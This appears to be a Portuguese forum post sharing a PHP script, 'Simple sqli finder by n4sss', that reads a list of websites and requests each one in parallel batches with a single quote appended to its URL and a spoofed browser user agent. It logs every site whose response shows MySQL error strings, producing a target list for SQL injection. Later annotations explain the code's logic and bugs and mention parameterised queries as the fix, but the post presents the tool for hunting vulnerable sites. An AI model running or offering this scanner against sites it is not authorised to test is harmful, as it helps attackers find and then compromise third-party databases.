Tool para automatizar a busca de sites com bugs de sql.
Use:
Código:
~$ php sqli.php sites.txt
Código:
Threads: o segundo argumento de sqli($host, 10, $l) define quantas requisições são feitas em paralelo (padrão: 10).
Código PHP:
<?php
/*
* Simple sqli finder by n4sss.
* Just set a file with sites to test sqli in argv[1]
*
* http://www.youtube.com/watch?v=NzCL9uLkQSI
* King! (8)
* Just listen.
*
* n-l4b[no_spam]hotmail[dot]com
*
* */
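// Run without an execution time limit; 0 is the documented "no limit" value.
// The original passed NULL and relied on it being coerced to 0.
set_time_limit(0);
// Turn off error reporting for the whole run. On PHP 8 error_reporting(NULL)
// only returns the current level and changes nothing, so the value is made
// explicit. Note that this also hides cURL and file-handling warnings.
error_reporting(0);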
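/**
 * Count the non-empty lines of a text file.
 *
 * The script uses this to report how many entries ended up in the results
 * file. Lines are split on "\n"; array_filter() drops every entry PHP treats
 * as falsy, so empty lines (and a line holding only "0") are not counted.
 *
 * @param string $file Path of the file to count.
 * @return int Number of non-empty lines; 0 when the file is missing or unreadable.
 */
function check($file){
    // The results file is only opened (and therefore created) when a response
    // matched, so a run without matches leaves nothing to read.
    if (!is_file($file) || !is_readable($file)) {
        return 0;
    }
    $contents = file_get_contents($file);
    if ($contents === false) {
        return 0;
    }
    return count(array_filter(explode("\n", $contents)));
}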
/**
 * Request every URL in $host with a single quote appended and record the ones
 * whose response body contains one of a few database-related strings.
 *
 * What the receiving server sees, as set below: the listed URL followed by one
 * "'" character, a fixed Firefox 22 User-Agent string, redirects followed, and
 * up to $threads requests issued together per batch.
 *
 * A recorded URL only means the pattern appeared in the response; the check is
 * a case-sensitive substring match and does not confirm an injectable query.
 * The signal it relies on is database error text echoed to the client, so
 * disabling error display in production removes that signal, while
 * parameterised queries address the underlying flaw.
 *
 * @param array  $host    List of URL strings to request.
 * @param int    $threads Maximum number of requests per batch.
 * @param string $l       Path of the results file; matching URLs are appended to it.
 * @return void
 */
function sqli($host, $threads, $l){
// One multi handle is shared by all batches; it is never closed in this function.
$multi = curl_multi_init();
// Split the URL list into batches of at most $threads entries.
$bol = array_chunk($host, $threads);
// Running counter used only for the progress output.
$cntz = 1;
foreach($bol as $site){
for($i=0;$i<=count($site)-1;$i++){
$ch[$i] = curl_init();
// The request URL is the listed URL with one trailing single quote.
curl_setopt($ch[$i], CURLOPT_URL, $site[$i].'\'');
curl_setopt($ch[$i], CURLOPT_FOLLOWLOCATION, TRUE);
// Return the body as a string so it can be inspected below.
curl_setopt($ch[$i], CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt($ch[$i], CURLOPT_USERAGENT, "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0");
// Each transfer is given at most 8 seconds.
curl_setopt($ch[$i], CURLOPT_TIMEOUT, 8);
curl_multi_add_handle($multi, $ch[$i]);
}do{
// Drive all transfers of the batch until curl reports none still running.
// The 1-microsecond sleep makes this close to a busy loop.
curl_multi_exec($multi, $handle);usleep(1);}while($handle>0);
// NOTE(review): $ch is not reset between batches. When the last batch is
// smaller than the previous one, handles left over from the earlier batch are
// visited again here and $site[$ch_id] is undefined for them.
foreach($ch as $ch_id => $cnt)
{
$grep[$ch_id] = curl_multi_getcontent($cnt);
// The easy handle is detached from the multi handle but never closed.
curl_multi_remove_handle($multi,$cnt);
print "[$cntz] Fuzzing -> $site[$ch_id]\n";
// Each "()" in the pattern is an empty group, so the function names match
// without parentheses. The bare "SQL" alternative matches any body containing
// that uppercase substring, so unrelated pages can be recorded as well.
if(preg_match('/Mysql_|SQL|mysql_num_rows()|mysql_fetch_assoc()|mysql_result()|mysql_fetch_array()|mysql_numrows()|mysql_preg_match()/',$grep[$ch_id]))
{
// Append the URL to the results file; the fopen() result is not checked.
$fp = fopen($l, "a");
fwrite($fp, $site[$ch_id]."\n");
fclose($fp);
flush();
}
$cntz++;
}
}
}
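// Entry point: the first CLI argument is the path of a newline-separated URL list.
// empty() keeps the original truthiness test but does not raise
// "Undefined array key 1" when the script is started without an argument.
if (empty($argv[1])) {
    print "+--------------------------------------------------+\n";
    print "|Please use correctly: |\n";
    print "|Specify the file with the sites in argv[1] :) |\n";
    print "+--------------------------------------------------+\n";
} else {
    print "\n############ Simple sqli finder by n4sss ############\n";
    if (!is_file($argv[1])) die("[-] FILE $argv[1] not found\n EXITING\n");
    // Lines are used as-is: nothing checks that an entry is a well-formed URL,
    // and array_filter() only drops empty lines.
    $host = array_filter(explode("\n", file_get_contents($argv[1])));
    // Results file, opened in append mode by sqli(); entries from earlier runs
    // stay in it and are included in the count printed below.
    $l = "sqli_vulns.txt";
    // Second argument is the number of requests issued per batch.
    sqli($host, 10, $l);
    $number = check($l);
    print "[] Fuzz ok n4sss!\n";
    print "We have -> ".$number." sites with sql error (:\n";
}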
?>